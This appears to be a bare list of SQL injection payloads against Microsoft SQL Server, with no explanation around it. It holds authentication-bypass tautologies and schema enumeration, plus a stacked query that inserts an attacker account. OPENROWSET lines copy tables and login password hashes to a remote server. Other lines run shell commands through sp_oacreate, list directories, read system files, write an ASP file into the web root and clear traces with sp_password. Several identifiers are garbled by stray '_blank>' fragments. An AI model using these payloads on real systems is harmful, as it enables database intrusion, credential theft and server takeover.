3.2 KiB
3.2 KiB
| 1 | ; and 1=1 and 1=22.admin adminuser user pass password .. |
|---|---|
| 2 | and 0<>(select count(*) from *) |
| 3 | group by users.id having 1=1-- |
| 4 | group by users.id, users.username, users.password, users.privs having 1=1-- |
| 5 | ; insert into users values( 666, attacker, foobar, 0xffff )-- |
| 6 | UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable- |
| 7 | and user_blank>_name()=dbo-- |
| 8 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) |
| 9 | ;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;-- |
| 10 | :a or name like fff%;-- ffff。 |
| 11 | and 1<>(select count(email) from [user]);-- |
| 12 | ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- |
| 13 | id=152 and exists(select * from aaa where aaa>5) |
| 14 | insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 |
| 15 | table2_blank>table1。IP |
| 16 | insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 |
| 17 | HASH_blank>hashsysxlogins。 |
| 18 | insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) |
| 19 | 1and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));-- |
| 20 | ;insert dirs exec master.dbo.xp_blank>_dirtree c:\-- |
| 21 | and 0<>(select top 1 paths from dirs)-- |
| 22 | and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- |
| 23 | ;create table dirs1(paths varchar(100), id int)-- |
| 24 | ;insert dirs exec master.dbo.xp_blank>_dirtree e:\web-- |
| 25 | and 0<>(select top 1 paths from dirs1)-- |
| 26 | and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) |
| 27 | and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 。 |
| 28 | and 1=(select user_blank>_id from USER_blank>_LOGIN) |
| 29 | and 0=(select user from USER_blank>_LOGIN where user>1) |
| 30 | exec sp_blank>_oacreate wscript.shell, @o out |
| 31 | exec sp_blank>_oamethod @o, run, NULL, notepad.exe |
| 32 | ; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe-- |
| 33 | declare @o int, @f int, @t int, @ret int |
| 34 | declare @line varchar(8000) |
| 35 | exec sp_blank>_oacreate scripting.filesystemobject, @o out |
| 36 | exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 |
| 37 | exec @ret = sp_blank>_oamethod @f, readline, @line out |
| 38 | exec sp_blank>_oacreate scripting.filesystemobject, @o out |
| 39 | exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 |
| 40 | exec @ret = sp_blank>_oamethod @f, writeline, NULL, |
| 41 | exec sp_blank>_oacreate speech.voicetext, @o out |
| 42 | exec sp_blank>_oamethod @o, register, NULL, foo, bar |
| 43 | exec sp_blank>_oasetproperty @o, speed, 150 |
| 44 | exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05 |
| 45 | ; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- |
| 46 | 1+and+1=1 |
| 47 | ');waitFor+Delay+'00:00:05' |
| 48 | ') or '1'='1-- |
| 49 | OR 1=1 |
| 50 | WHERE 1=1 AND 1=1 |
| 51 | ORDER BY 1-- |
| 52 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' |